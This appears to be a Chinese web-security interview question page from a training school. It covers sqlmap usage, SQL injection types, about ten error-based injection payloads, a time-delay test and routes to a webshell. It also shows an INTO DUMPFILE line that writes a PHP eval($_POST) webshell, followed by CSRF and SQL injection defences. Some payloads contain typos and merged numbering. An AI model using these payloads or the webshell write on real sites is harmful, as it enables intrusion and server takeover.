1、sqlmap,怎么對一個注入點注入?
1)如果是 get 型號,直接,sqlmap -u "諸如點網址".
2) 如果是 post 型諸如點,可以 sqlmap -u "注入點網址” --data="post 的參數"
3)如果是 cookie,X-Forwarded-For 等,可以訪問的時候,用 burpsuite 抓包,注入處用號替換,放到文件里,然后 sqlmap -r "文件地址"
2、sql 注入的幾種類型?
1)報錯注入
2)bool 型注入
3)延時注入
4)寬字節注入
3、報錯注入的函數有哪些?10 個
1)and extractvalue(1, concat(0x7e,(select @@version),0x7e))】】】2)通過 floor 報錯 向下取整 3)
+and
updatexml(1, concat(0x7e,(secect @@version),0x7e),1)4).geometrycollection()select from
test
where id=1 and geometrycollection((select from(selectfrom(select
user())a)b));5).multipoint()select from test where id=1 and
multipoint((select from(select
from(select
user())a)b));6).polygon()select from test where
id=1 and polygon((select
from(select
from(select user())a)b));7).multipolygon()select from test where id=1 and
multipolygon((select from(select from(select user())a)b));8).linestring()select from test
where id=1 and linestring((select from(select
from(select
user())a)b));9).multilinestring()select from
test where id=1 and multilinestring((select
from(select from(select user())a)b));10).exp()select from test where id=1 and exp(~(select
* from(select user())a));
4、延時注入如何來判斷?
if(ascii(substr(“hello”, 1, 1))=104, sleep(5), 1)
5、如何拿一個網站的 webshell?
上傳,后臺編輯模板,sql 注入寫文件,命令執行,代碼執行, 一些已經爆出的 cms 漏洞,比如 dedecms 后臺可以直接建立腳本文件,wordpress 上傳插件包含腳本文件 zip 壓縮包等
6、sql 注入寫文件都有哪些函數?
select '一句話' into
outfile '路徑'select '一句話' into dumpfile '路徑'select '
eval($_POST[1]) ?>'
into dumpfile 'd:\wwwroot\baidu.com\nvhack.php';
7、如何防止 CSRF?
1,驗證 referer
2,驗證 token
8、owasp 漏洞都有哪些?
1)SQL 注入防護方法:
2)失效的身份認證和會話管理
3)跨站腳本攻擊 XSS
4)直接引用不安全的對象
5)安全配置錯誤
6)敏感信息泄露
7)缺少功能級的訪問控制
8)跨站請求偽造 CSRF
9)使用含有已知漏洞的組件
9、未驗證的重定向和轉發49、SQL 注入防護方法?
1)使用安全的 API
2)對輸入的特殊字符進行 Escape 轉義處理
3)使用白名單來規范化輸入驗證方法
4)對客戶端輸入進行控制,不允許輸入 SQL 注入相關的特殊字符
5)服務器端在提交數據庫進行 SQL 查詢之前,對特殊字符進行過濾、轉義、替換、刪除。
更多關于網絡安全培訓的問題,歡迎咨詢千鋒教育在線名師。千鋒教育擁有多年IT培訓服務經驗,采用全程面授高品質、高體驗培養模式,擁有國內一體化教學管理及學員服務,助力更多學員實現高薪夢想。
京公網安備 11010802030320號